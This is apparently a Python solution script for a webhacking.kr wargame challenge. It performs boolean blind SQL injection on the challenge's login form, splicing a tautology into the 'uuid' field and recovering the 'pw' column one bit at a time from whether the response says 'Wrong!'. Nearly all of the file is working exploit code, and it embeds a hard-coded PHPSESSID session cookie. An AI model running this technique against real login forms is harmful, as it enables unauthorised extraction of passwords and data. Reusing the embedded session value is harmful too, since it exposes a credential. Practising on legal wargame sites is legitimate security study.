import http.client
import math
import urllib
import urllib.parse
def fetch_string(statement):
    """Recover the value of the SQL expression *statement* one byte at a time.

    For every position ``pos`` (1-based) the eight bits of the byte are probed
    individually through the boolean oracle ``test`` with the expression
    ``ord(mid(statement,pos,1))&2**bit``; the answers are gathered LSB-first,
    reversed into MSB-first order, and converted back to a character.

    The number of bytes is fixed at 32 rather than queried first, so a
    shorter value presumably comes back padded with whatever the oracle
    reports for positions past its end (likely NUL characters — confirm
    against the backend).  Intermediate bit strings and the partial result
    are printed after every byte; the caller receives the full string.
    """
    byte_count = 32  # deliberately not looked up from the oracle

    recovered = ''
    for pos in range(1, byte_count + 1):
        # One oracle call per bit, lowest bit first.
        bits_lsb_first = ''.join(
            '1' if test('ord(mid(%s,%d,1))&%d' % (statement, pos, 2 ** bit)) else '0'
            for bit in range(8)
        )
        bits_msb_first = bits_lsb_first[::-1]
        print(bits_msb_first)
        print(bits_lsb_first)
        recovered += chr(int(bits_msb_first, 2))
        print(recovered)

    return recovered
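def test(cond):
    """Boolean oracle for the challenge endpoint.

    ``cond`` is URL-quoted and spliced into the ``uuid`` form field of a POST
    to ``/challenge/bonus/bonus-2/index.php``; the function returns ``True``
    when the response body does not contain ``'Wrong!'``.

    The connection is now closed in a ``finally`` block: the original left
    every ``HTTPConnection`` open, and ``fetch_string`` issues 256 of these
    requests per 32-byte string.

    The ``Cookie`` header carries a hard-coded ``PHPSESSID``.  That value is
    a live session credential and belongs in the environment or a config
    file, not in a script that gets published.
    """
    c = http.client.HTTPConnection('webhacking.kr')
    head = {'Host': 'webhacking.kr'}
    head['Upgrade-Insecure-Requests'] = '1'
    head['Content-Type'] = 'application/x-www-form-urlencoded'
    head['Cookie'] = 'id=rbc; PHPSESSID=7e74a61eb46338352194ab8d2d1535db'
    # urllib.parse is relied on here; the file should import it explicitly
    # rather than depend on http.client having pulled it in.
    _body = 'uuid=admin%27+and+{}%23&pw=123'.format(urllib.parse.quote(cond))
    try:
        c.request('POST', '/challenge/bonus/bonus-2/index.php', headers=head, body=_body)
        res = c.getresponse().read().decode()
    finally:
        c.close()
    return 'Wrong!' not in res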
# Script entry point: run the extraction for the ``pw`` column and discard the result
# (the per-byte progress is already printed by fetch_string).
fetch_string(statement='pw')
